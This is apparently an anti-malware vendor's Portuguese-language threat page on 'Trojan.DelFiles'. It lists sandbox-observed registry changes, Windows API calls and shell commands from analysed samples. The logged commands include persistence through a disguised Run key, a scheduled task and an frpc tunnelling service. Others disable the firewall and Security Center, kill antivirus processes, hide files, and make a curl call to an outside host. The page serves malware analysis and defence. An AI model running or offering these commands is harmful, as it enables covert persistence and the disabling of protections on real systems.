HKCU\software\microsoft\windows\currentversion\explorer::slowcontextmenuentries		RegNtPreCreateKey
HKCU\local settings\muicache\1b\52c64b7e::@c:\windows\system32\ieframe.dll,-55175	Internet Explorer	RegNtPreCreateKey
HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc1c75		RegNtPreCreateKey
HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc1c75		RegNtPreCreateKey
HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc1c75		RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe	鸸騫眈ǜ	RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe	羡埓矏ǜ	RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe	䘁埘矏ǜ	RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe	꩚焵疘ǜ	RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe	罹禕ǜ	RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe	珁賷癎ǜ	RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe	粱軙癎ǜ	RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe	ᇲ遭矻ǜ	RegNtPreCreateKey
HKLM\software\microsoft\cryptography\oid\encodingtype 0\cryptdllfindoidinfo\1.3.6.1.4.1.311.60.3.1!7::name	szOID_ROOT_PROGRAM_AUTO_UPDATE_CA_REVOCATION	RegNtPreCreateKey
HKLM\software\microsoft\cryptography\oid\encodingtype 0\cryptdllfindoidinfo\1.3.6.1.4.1.311.60.3.2!7::name	szOID_ROOT_PROGRAM_AUTO_UPDATE_END_REVOCATION	RegNtPreCreateKey
HKLM\software\microsoft\cryptography\oid\encodingtype 0\cryptdllfindoidinfo\1.3.6.1.4.1.311.60.3.3!7::name	szOID_ROOT_PROGRAM_NO_OCSP_FAILOVER_TO_CRL	RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe	⮷옧縁ǜ	RegNtPreCreateKey
HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc1c75		RegNtPreCreateKey
HKLM\software\wow6432node\microsoft\windows\currentversion\run::synaptics pointing device driver	C:\ProgramData\Synaptics\Synaptics.exe	RegNtPreCreateKey
HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc1c75		RegNtPreCreateKey
HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc3475		RegNtPreCreateKey
HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc1c75		RegNtPreCreateKey
HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc1c75		RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe	䧛嶡芬ǜ	RegNtPreCreateKey
HKCU\local settings\muicache\1b\52c64b7e::@c:\windows\system32\ndfapi.dll,-40001	Windows Network Diagnostics	RegNtPreCreateKey
HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc1c75		RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe	뒑鎑老ǜ	RegNtPreCreateKey

34 additional registry modifications are not displayed above.

Windows API Usage

Category	API
Process Shell Execute	CreateProcess ShellExecuteEx WriteConsole
Syscall Use	ntdll.dll!NtAccessCheck ntdll.dll!NtAccessCheckByType ntdll.dll!NtAddAtomEx ntdll.dll!NtAdjustPrivilegesToken ntdll.dll!NtAlertThreadByThreadId ntdll.dll!NtAlpcAcceptConnectPort ntdll.dll!NtAlpcConnectPort ntdll.dll!NtAlpcConnectPortEx ntdll.dll!NtAlpcCreatePort ntdll.dll!NtAlpcCreatePortSection Show More ntdll.dll!NtAlpcCreateResourceReserve ntdll.dll!NtAlpcCreateSectionView ntdll.dll!NtAlpcCreateSecurityContext ntdll.dll!NtAlpcDeleteSecurityContext ntdll.dll!NtAlpcQueryInformation ntdll.dll!NtAlpcQueryInformationMessage ntdll.dll!NtAlpcSendWaitReceivePort ntdll.dll!NtAlpcSetInformation ntdll.dll!NtApphelpCacheControl ntdll.dll!NtAssociateWaitCompletionPacket ntdll.dll!NtCancelIoFileEx ntdll.dll!NtCancelWaitCompletionPacket ntdll.dll!NtClearEvent ntdll.dll!NtClose ntdll.dll!NtCompareSigningLevels ntdll.dll!NtConnectPort ntdll.dll!NtCreateEvent ntdll.dll!NtCreateFile ntdll.dll!NtCreateIoCompletion ntdll.dll!NtCreateKey ntdll.dll!NtCreateMutant ntdll.dll!NtCreateNamedPipeFile ntdll.dll!NtCreatePrivateNamespace ntdll.dll!NtCreateSection ntdll.dll!NtCreateSemaphore ntdll.dll!NtCreateThreadEx ntdll.dll!NtCreateTimer ntdll.dll!NtCreateTimer2 ntdll.dll!NtCreateTransaction ntdll.dll!NtCreateUserProcess ntdll.dll!NtCreateWaitCompletionPacket ntdll.dll!NtCreateWorkerFactory ntdll.dll!NtDelayExecution ntdll.dll!NtDeleteAtom ntdll.dll!NtDeleteKey ntdll.dll!NtDeleteValueKey ntdll.dll!NtDeviceIoControlFile ntdll.dll!NtDuplicateObject ntdll.dll!NtDuplicateToken ntdll.dll!NtEnumerateKey ntdll.dll!NtEnumerateValueKey ntdll.dll!NtFlushBuffersFile ntdll.dll!NtFlushProcessWriteBuffers ntdll.dll!NtFreeVirtualMemory ntdll.dll!NtFsControlFile ntdll.dll!NtGetCachedSigningLevel ntdll.dll!NtGetCompleteWnfStateSubscription ntdll.dll!NtGetNlsSectionPtr ntdll.dll!NtImpersonateAnonymousToken ntdll.dll!NtMapViewOfSection ntdll.dll!NtNotifyChangeKey ntdll.dll!NtOpenDirectoryObject ntdll.dll!NtOpenEvent ntdll.dll!NtOpenFile ntdll.dll!NtOpenKey ntdll.dll!NtOpenKeyEx ntdll.dll!NtOpenKeyTransactedEx ntdll.dll!NtOpenMutant ntdll.dll!NtOpenProcess ntdll.dll!NtOpenProcessToken ntdll.dll!NtOpenProcessTokenEx ntdll.dll!NtOpenSection ntdll.dll!NtOpenSemaphore ntdll.dll!NtOpenSymbolicLinkObject ntdll.dll!NtOpenThread ntdll.dll!NtOpenThreadToken ntdll.dll!NtOpenThreadTokenEx ntdll.dll!NtPowerInformation ntdll.dll!NtProtectVirtualMemory ntdll.dll!NtQueryAttributesFile ntdll.dll!NtQueryDebugFilterState ntdll.dll!NtQueryDefaultLocale ntdll.dll!NtQueryDirectoryFile ntdll.dll!NtQueryDirectoryFileEx ntdll.dll!NtQueryEvent ntdll.dll!NtQueryFullAttributesFile ntdll.dll!NtQueryInformationAtom ntdll.dll!NtQueryInformationFile ntdll.dll!NtQueryInformationJobObject ntdll.dll!NtQueryInformationProcess ntdll.dll!NtQueryInformationThread ntdll.dll!NtQueryInformationToken ntdll.dll!NtQueryKey ntdll.dll!NtQueryLicenseValue ntdll.dll!NtQueryObject ntdll.dll!NtQueryPerformanceCounter ntdll.dll!NtQuerySecurityAttributesToken ntdll.dll!NtQuerySecurityObject ntdll.dll!NtQuerySecurityPolicy ntdll.dll!NtQuerySymbolicLinkObject 208 additional items are not displayed above.
Process Terminate	TerminateProcess
User Data Access	GetComputerName GetComputerNameEx GetUserDefaultLocaleName GetUserObjectInformation
Encryption Used	BCryptOpenAlgorithmProvider CryptAcquireContext
Other Suspicious	AdjustTokenPrivileges SetWindowsHookEx
Process Manipulation Evasion	NtUnmapViewOfSection ReadProcessMemory
Network Winsock2	WSAStartup
Network Winsock	accept bind closesocket connect freeaddrinfo getaddrinfo getpeername getsockname inet_addr recv Show More send setsockopt socket
Keyboard Access	GetAsyncKeyState GetKeyState
Anti Debug	IsDebuggerPresent NtQuerySystemInformation OutputDebugString
Service Control	OpenSCManager OpenService
Network Icmp	IcmpCreateFile IcmpSendEcho2Ex

Shell Command Execution


							"C:\WINDOWS\sysnative\cmd" /c "\52B4.tmp\52B5.tmp\52B6.bat c:\users\user\downloads\d225bd08b44624049ac7c912ac0978c814f68b41_0000167424.exe"


							C:\WINDOWS\system32\mode.com mode  1


							C:\WINDOWS\system32\taskkill.exe taskkill  -im "VALORANT-Win64-Shipping.exe" -f


							"C:\WINDOWS\sysnative\cmd" /c "\4AD5.tmp\4AD6.tmp\4AE6.bat c:\users\user\downloads\a76667a5775b60ae2c98af597649783d6b4b57ea_0000282624.exe"


							"C:\WINDOWS\sysnative\cmd" /c "\5499.tmp\54A9.tmp\54AA.bat c:\users\user\downloads\6df5a47d76c061ae34982fad94f0bf0d8cdf6231_0000121856.exe"


									"C:\WINDOWS\sysnative\cmd" /c "\44A6.tmp\44A7.tmp\44B8.bat c:\users\user\downloads\196abdfb4ff77993f88f162aff2caca8cf0ee27d_0000091136.exe"


									C:\WINDOWS\system32\net.exe net  stop spooler


									C:\WINDOWS\system32\net.exe net  start spooler


									"C:\WINDOWS\sysnative\cmd" /c "\5F38.tmp\5F39.tmp\5F49.bat c:\users\user\downloads\61fcc5c92c1943773edc11473825897339dec7b4_0000091136.exe"


									C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe powershell  -ExecutionPolicy Bypass -File "c:\Users\user\downloads\RomexisBurner-FullGUI.ps1"


									"C:\WINDOWS\sysnative\cmd" /c "\EC4B.tmp\EC4C.tmp\EC5D.bat c:\users\user\downloads\d758b4b1aa5b98ebb13418188d2e5dca9f673b9f_0000091136.exe"


									"C:\Users\Bnmoygaj\AppData\Local\Temp\is-J0EMQ.tmp\652f6c89bf9170d41d6213b77a493c24ca74e2a8_0005770421.tmp" /SL5="$40028,5265378,159232,c:\users\user\downloads\652f6c89bf9170d41d6213b77a493c24ca74e2a8_0005770421.exe"


									"C:\WINDOWS\sysnative\cmd" /c "\67C3.tmp\67C4.tmp\67C5.bat c:\users\user\downloads\2e64f09a8a3e093d79e20affff83e328043f29ca_0000158720.exe"


									"C:\WINDOWS\sysnative\cmd" /c "\C7E7.tmp\C7E8.tmp\C7E9.bat c:\users\user\downloads\a3f638b0b99ca22507bd4be393f7b7b8477f85f5_0000368640.exe"


									C:\WINDOWS\system32\curl.exe curl  -s "https://portalerichieste.it/API/gestioneFile?token=g7x9l2qw3ykt84vpm6ajd5rnc-pal&myMenu&ver=5.3"


									"C:\WINDOWS\sysnative\cmd" /c "\DB10.tmp\DB21.tmp\DB22.bat c:\users\user\downloads\2fa6bb3dc5eb9688f3ab7d445874933b20f0f7d6_0000321536.exe"


									C:\Windows\System32\reg.exe reg  query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\OEMInformation" /v "Model"


									C:\Users\Gkyzesen\AppData\Local\Temp\IXP000.TMP\B3o34.exe


									C:\Users\Gkyzesen\AppData\Local\Temp\IXP001.TMP\1G10A9.exe


									C:\Users\Gkyzesen\AppData\Local\Temp\IXP001.TMP\2z0907.exe


									open C:\WINDOWS\sysnative\cmd /c "\431F.tmp\4330.tmp\4331.bat c:\users\user\downloads\a1dff17507721b4a8a0cd8cf8ef3d135a14c1f33_0002915840.exe"


									C:\WINDOWS\system32\tasklist.exe tasklist  /FI "IMAGENAME eq svchost32.exe"


									C:\WINDOWS\system32\find.exe find  /I "svchost32.exe"


									WriteConsole: ERROR: CoInitial


									C:\WINDOWS\system32\attrib.exe attrib  +h +s "C:\Users\Ndaxaxgn\AppData\Roaming\windowshost"


									C:\WINDOWS\system32\attrib.exe attrib  +h "C:\Users\Ndaxaxgn\AppData\Roaming\windowshost\*"


									C:\WINDOWS\system32\attrib.exe attrib  +h "C:\Users\Ndaxaxgn\AppData\Roaming\windowshost\runhidden.vbs"


									C:\WINDOWS\system32\schtasks.exe schtasks  /create /tn "WindowsHostService" /tr "wscript.exe \"C:\Users\Ndaxaxgn\AppData\Roaming\windowshost\runhidden.vbs\"" /sc onlogon /rl highest /f


									WriteConsole: Access is denied


									"C:\WINDOWS\sysnative\cmd" /c "\97AB.tmp\97AC.tmp\97AD.bat c:\users\user\downloads\611af08fa125bb06c6ffda91f07bb071740f1cb5_0000136704.exe"


									C:\Windows\System32\reg.exe Reg.exe  query "HKU\S-1-5-19\Environment"


									C:\Windows\System32\reg.exe Reg.exe  add "HKLM\SYSTEM\CurrentControlSet\Services\stornvme\Parameters" /v "StorNVMeAllowZeroLatency" /t REG_DWORD /d "1" /f


									C:\Windows\System32\reg.exe Reg.exe  add "HKLM\SYSTEM\CurrentControlSet\Services\stornvme\Parameters" /v "QueueDepth" /t REG_DWORD /d "64" /f


									C:\Windows\System32\reg.exe Reg.exe  add "HKLM\SYSTEM\CurrentControlSet\Services\stornvme\Parameters" /v "NvmeMaxReadSplit" /t REG_DWORD /d "4" /f


									C:\Windows\System32\reg.exe Reg.exe  add "HKLM\SYSTEM\CurrentControlSet\Services\stornvme\Parameters" /v "NvmeMaxWriteSplit" /t REG_DWORD /d "4" /f


									C:\Windows\System32\reg.exe Reg.exe  add "HKLM\SYSTEM\CurrentControlSet\Services\stornvme\Parameters" /v "ForceFlush" /t REG_DWORD /d "1" /f


									C:\Windows\System32\reg.exe Reg.exe  add "HKLM\SYSTEM\CurrentControlSet\Services\stornvme\Parameters" /v "ImmediateData" /t REG_DWORD /d "1" /f


									C:\Windows\System32\reg.exe Reg.exe  add "HKLM\SYSTEM\CurrentControlSet\Services\stornvme\Parameters" /v "MaxSegmentsPerCommand" /t REG_DWORD /d "256" /f


									C:\Windows\System32\reg.exe Reg.exe  add "HKLM\SYSTEM\CurrentControlSet\Services\stornvme\Parameters" /v "MaxOutstandingCmds" /t REG_DWORD /d "256" /f


									C:\Windows\System32\reg.exe Reg.exe  add "HKLM\SYSTEM\CurrentControlSet\Services\stornvme\Parameters" /v "ForceEagerWrites" /t REG_DWORD /d "1" /f


									C:\Windows\System32\reg.exe Reg.exe  add "HKLM\SYSTEM\CurrentControlSet\Services\stornvme\Parameters" /v "MaxQueuedCommands" /t REG_DWORD /d "256" /f


									C:\Windows\System32\reg.exe Reg.exe  add "HKLM\SYSTEM\CurrentControlSet\Services\stornvme\Parameters" /v "MaxOutstandingIORequests" /t REG_DWORD /d "256" /f


									C:\Windows\System32\reg.exe Reg.exe  add "HKLM\SYSTEM\CurrentControlSet\Services\stornvme\Parameters" /v "NumberOfRequests" /t REG_DWORD /d "1500" /f


									"C:\WINDOWS\sysnative\cmd" /c "\52D4.tmp\52E4.tmp\52E5.bat c:\users\user\downloads\36e41c15e33fae9a43bf653bc73f8733120e5020_0005888512"


									C:\WINDOWS\system32\reg.exe reg  add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /f /v LocalAccountTokenFilterPolicy /t Reg_DWORD /d 1


									C:\WINDOWS\system32\sc.exe sc  create kernels binPath="C:\WINDOWS\system32\cmd.exe /c start  C:\Users\Tfebyfkc\AppData\Roaming\frpc.exe -c C:\Users\Tfebyfkc\AppData\Roaming\win.toml" DisplayName= "kernelservice" type=own start=auto


									C:\WINDOWS\system32\sc.exe sc  start kernels


									(NULL) WLU_x86.exe


									"C:\WINDOWS\sysnative\cmd" /c "\5506.tmp\5526.tmp\5527.bat c:\users\user\downloads\b7aef8840a2d2c86aa41fa78dd37a365f9c03216_0000968704"


									C:\WINDOWS\system32\Dism.exe dism  /Online /Remove-Capability /CapabilityName:Print.Management.Console~~~~0.0.1.0


									C:\WINDOWS\system32\Dism.exe dism  /Online /add-Capability /CapabilityName:Print.Management.Console~~~~0.0.1.0


									"C:\WINDOWS\sysnative\cmd" /c "\4552.tmp\4553.tmp\4554.bat c:\users\user\downloads\1ac14b67f79ca60c6d2a7f531dbeda86153edb92_0000126464"


									"C:\WINDOWS\sysnative\cmd" /c "\5804.tmp\5814.tmp\5815.bat c:\users\user\downloads\7afe06c3f36649a6cf3c859b97c975ed20018f55_0000091136"


									"C:\WINDOWS\sysnative\cmd" /c "\D937.tmp\D938.tmp\D939.bat c:\users\user\downloads\525e45acb542f56394bd478596a58df03e4e6aa6_0000956416"


									C:\WINDOWS\system32\chcp.com chcp  65001


									"C:\WINDOWS\sysnative\cmd" /c "\7BCE.tmp\7BCF.tmp\7BD0.bat c:\users\user\downloads\69e22ec07d8ed9552db47640eca6bf3eacec4f99_0000093184"


									"C:\WINDOWS\sysnative\cmd" /c "\5109.tmp\510A.tmp\511A.bat c:\users\user\downloads\acf10261800b7fea776152012d7caadcbc416a11_0000097792"


									C:\WINDOWS\system32\msg.exe msg  * "Erreur : Le fichier Discord est obligatoire et doit contenir les bonnes informations / The file Discord is mandatory and must contain the correct information."


									"C:\WINDOWS\sysnative\cmd" /c "\FF4.tmp\FF5.tmp\FF6.bat c:\users\user\downloads\646ad98b2ab8cf510b2ef4fd6204ce1500b77d45_0000094208"


									C:\WINDOWS\system32\net.exe net  stop ΓÇ£Security CenterΓÇ¥


									C:\WINDOWS\system32\netsh.exe netsh  firewall set opmode mode=disable


									C:\WINDOWS\system32\tskill.exe tskill  /A av*


									C:\WINDOWS\system32\tskill.exe tskill  /A fire*


									C:\WINDOWS\system32\tskill.exe tskill  /A anti*


									C:\WINDOWS\system32\tskill.exe tskill  /A spy*


									C:\WINDOWS\system32\tskill.exe tskill  /A bullguard


									"C:\WINDOWS\sysnative\cscript" \80A7.tmp\80A8.tmp\80A9.vbs //Nologo


									open C:\WINDOWS\sysnative\cmd /c "\4C18.tmp\4C19.tmp\4C1A.bat c:\users\user\downloads\9158371994218b3f5440f0d85f97d4cf5948f9c9_0000076800"


									WriteConsole:


									WriteConsole: c:\4C18.tmp>


									WriteConsole: "SecurtyHeathSer


									c:\4C18.tmp\securtyheathservice.exe "SecurtyHeathService.exe"


									"C:\WINDOWS\sysnative\cmd" /c "\F431.tmp\F432.tmp\F442.bat c:\users\user\downloads\8c301368e70ac29e4b6d63245ca15961eb89261a_0000091136"


									C:\WINDOWS\system32\netsh.exe netsh  wlan delete Profile name="eduroam"


									C:\WINDOWS\system32\netsh.exe netsh  wlan add profile filename="C:\wireless\WiFi-eduroam.xml"


									"C:\WINDOWS\sysnative\cmd" /c "\B14D.tmp\B15D.tmp\B15E.bat c:\users\user\downloads\916064be4febf2f907f7e0918e9df43ed25e548b_0000116736"


									"C:\WINDOWS\sysnative\cmd" /c "\4216.tmp\4217.tmp\4218.bat c:\users\user\downloads\6b67be539f6c0f5d9e6520bfd013529933137bce_0000272896"


									"C:\WINDOWS\sysnative\cmd" /c "\5AF2.tmp\5B51.tmp\5B61.bat c:\users\user\downloads\30ff8cde54cc6567ef0b67100092d1c585ae24d6_0000092672"


									C:\WINDOWS\system32\net.exe net  session


									C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe powershell  -Command "Start-Process 'c:\Users\user\downloads\30ff8cde54cc6567ef0b67100092d1c585ae24d6_0000092672' -Verb runAs"


									"C:\WINDOWS\sysnative\cmd" /c "\5A27.tmp\5A37.tmp\5A58.bat c:\users\user\downloads\6d13efbb7898e835b981994ae9bebb8ae0268876_0000112128"


									C:\WINDOWS\explorer.exe Explorer  ftp://informa


									"C:\WINDOWS\sysnative\cmd" /c "\55A2.tmp\55B3.tmp\55B4.bat c:\users\user\downloads\4c38ca9c6a422f02c1ce1f7460b8d627c891b6cc_0000092160"


									"C:\WINDOWS\sysnative\cmd" /c "\42E1.tmp\42E2.tmp\42E3.bat c:\users\user\downloads\4816fadcf00e01e862d4de2d0e54942038da2d4a_0000092672"


									C:\WINDOWS\system32\reg.exe REG  DELETE "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop" /f


									C:\WINDOWS\system32\reg.exe REG  DELETE "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /f


									C:\WINDOWS\system32\reg.exe REG  DELETE "HKCU\Software\Policies\Microsoft\Windows\Personalization" /f


									C:\WINDOWS\system32\reg.exe REG  DELETE "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop" /f


									C:\WINDOWS\system32\reg.exe REG  DELETE "HKLM\Software\Policies\Microsoft\Windows\Personalization" /f


									C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe powershell  -command "Add-Type -Namespace WallpaperNS -Name WallpaperClass -MemberDefinition 'public class WallpaperClass { [System.Runtime.InteropServices.DllImport(\"user32.dll\"


									"C:\WINDOWS\sysnative\cmd" /c "\4988.tmp\4999.tmp\499A.bat c:\users\user\downloads\35343bd6d59cd3ac4369bb2f922f1c19eaea62d6_0000360960"


									C:\WINDOWS\system32\control.exe C:\WINDOWS\system32\control  firewall.cpl


									open %SystemRoot%\system32\rundll32.exe Shell32.dll,Control_RunDLL firewall.cpl


									"C:\WINDOWS\sysnative\cmd" /c "\627.tmp\628.tmp\629.bat c:\users\user\downloads\c2b799eafc9e626756c3110dab3e1c67970c9d14_0006734848"


									"C:\WINDOWS\sysnative\cscript" \6E89.tmp\6E8A.tmp\6E8B.vbs //Nologo


									"C:\WINDOWS\sysnative\cmd" /c "\3E32.tmp\3E33.tmp\3E34.bat c:\users\user\downloads\e975484ce976b767fa7e370ebae11e8e7e089d79_0000093184"


									C:\WINDOWS\system32\chcp.com chcp  1250


									C:\WINDOWS\system32\timeout.exe timeout   3


									C:\WINDOWS\system32\cmd.exe C:\WINDOWS\system32\cmd.exe  /S /D /c" dir /a /b *.den "


									C:\WINDOWS\system32\find.exe find  /c ".den"


									"C:\WINDOWS\sysnative\cmd" /c "\41F6.tmp\41F7.tmp\4208.bat c:\users\user\downloads\95ef95c416ead7f3636f83d251f8b3ecf38fdf43_0000363008"


									C:\WINDOWS\system32\chcp.com chcp  1251


									"C:\WINDOWS\sysnative\cmd" /c "\D0F3.tmp\D104.tmp\D105.bat c:\users\user\downloads\4f1ebdc88c182664315e080dbfb7ef88b88b0e72_0000099840"


									"C:\WINDOWS\sysnative\cmd" /c "\4B7F.tmp\4B80.tmp\4B81.bat c:\users\user\downloads\ccac3b7aac9a40078723632d48710d748a98a2ed_0000091648"


									open C:\WINDOWS\sysnative\wscript \4561.tmp\4562.tmp\4563.vbs  //Nologo


									"C:\WINDOWS\sysnative\cmd" /c "\6722.tmp\6723.tmp\6724.bat c:\users\user\downloads\a51a3e1cf8bbd569d246a2a8a47141cf5c8da217_0000122368"


									C:\WINDOWS\system32\PING.EXE ping  -n 1 www.uol.com.br


									C:\WINDOWS\system32\find.exe find  "TTL="


									"C:\WINDOWS\sysnative\cmd" /c "\5852.tmp\5863.tmp\5864.bat c:\users\user\downloads\d0bfbc95a066dfa10ebd5204abea7ed0e71e9a0d_0000096768"


									open C:\WINDOWS\sysnative\cmd /c "\99A4.tmp\99A5.tmp\99B6.bat c:\users\user\downloads\38e1bc03f2af7b84740626a783bc0da32ab8e085_0002046464"


									WriteConsole: c:\users\user\do


									WriteConsole: cd


									WriteConsole:  /d c:\Users\use


									WriteConsole: SET


									WriteConsole:  workpath=c:\use


									WriteConsole: CHCP


									WriteConsole:  65001


									WriteConsole: 1>


									WriteConsole: NUL


									C:\WINDOWS\system32\chcp.com CHCP  65001


									WriteConsole: attrib


									WriteConsole:  +S +H "c:\users


									C:\WINDOWS\system32\attrib.exe attrib  +S +H "c:\users\user\downloads\findstr.ps1"


									C:\WINDOWS\system32\attrib.exe attrib  +S +H "c:\users\user\downloads\libiconv2.dll"


									C:\WINDOWS\system32\attrib.exe attrib  +S +H "c:\users\user\downloads\libintl3.dll"


									C:\WINDOWS\system32\attrib.exe attrib  +S +H "c:\users\user\downloads\usbview.exe"


									C:\WINDOWS\system32\attrib.exe attrib  +S +H "c:\users\user\downloads\TEST.exe"


									C:\WINDOWS\system32\attrib.exe attrib  +S +H "c:\users\user\downloads\showusbnumber.exe"


									C:\WINDOWS\system32\attrib.exe attrib  +S +H "c:\users\user\downloads\setwrong.cmd"


									WriteConsole: CLS


									WriteConsole: pushd


									WriteConsole:  "c:\users\user\


									WriteConsole: set


									WriteConsole:  netcycle=0


									WriteConsole: ping


									WriteConsole:  -n 1 www.baidu.


									WriteConsole:  |


									WriteConsole: find


									WriteConsole:  /i "Received =


									C:\WINDOWS\system32\PING.EXE ping  -n 1 www.baidu.com


									C:\WINDOWS\system32\find.exe find  /i "Received = 1"


									"C:\WINDOWS\sysnative\cmd" /c "\4CA5.tmp\4CB5.tmp\4CB6.bat c:\users\user\downloads\034a828d1793b2544b48f0229977fa12d3fbbb98_0000091648"


									C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe powershell  -Command "Add-Type -AssemblyName PresentationFramework


									"C:\WINDOWS\sysnative\cmd" /c "\C102.tmp\C103.tmp\C104.bat c:\users\user\downloads\6f31c89c6254614c79ef264d54dd72b2e77ddad9_0000091136"


									"C:\WINDOWS\sysnative\cmd" /c "\4458.tmp\4468.tmp\4469.bat c:\users\user\downloads\4ca7ec198843a934160505cc44b9ab4bd97160ea_0000097792"


									C:\WINDOWS\system32\msg.exe msg  "Ddvrlcbi" "Failed folder name change from cncm to cncm-router"


									C:\WINDOWS\system32\msg.exe msg  "Ddvrlcbi" "Failed folder name change from cncm-plasma to cncm"


									C:\WINDOWS\system32\cscript.exe cscript  CreateShortcut.vbs


									C:\Windows\System32\ie4uinit.exe C:\Windows\System32\ie4uinit.exe  -show


									C:\WINDOWS\system32\msg.exe msg  "Ddvrlcbi" "Failed directory change"

134 additional execution are not displayed above.

O Pedido de Falência da Processadora de Pagamentos Digitais River GmbH do EnigmaSoft não Afeta a Proteção Anti-Malware dos Clientes do SpyHunter

Buscar

Mudar de região

Trojan.DelFiles

Cartão de pontuação de ameaças

EnigmaSoft Threat Scorecard

Relatório de análise

Informação geral

Known Samples

Known Samples

Windows Portable Executable Attributes

Windows Portable Executable Attributes

File Icons

File Icons

Windows PE Version Information

Windows PE Version Information

File Traits

Block Information

Block Information

Visual Map

Similar Families

Similar Families

Files Modified

Files Modified

Registry Modifications

Registry Modifications

Windows API Usage

Windows API Usage

Shell Command Execution

Shell Command Execution

Enviar o Comentário

Tendendo

Trojan.Win32.Pasta.na

Professeur Ransomware

O Trojan NotCompatible Atualizado Passa a Possuir...

Mais visto

Como Corrigir o Erro 'Driver da Impressora...

O Discord Exibe uma Tela Preta ao Compartilhar a Tela

Como Corrigir 'o macOS não pode verificar se este...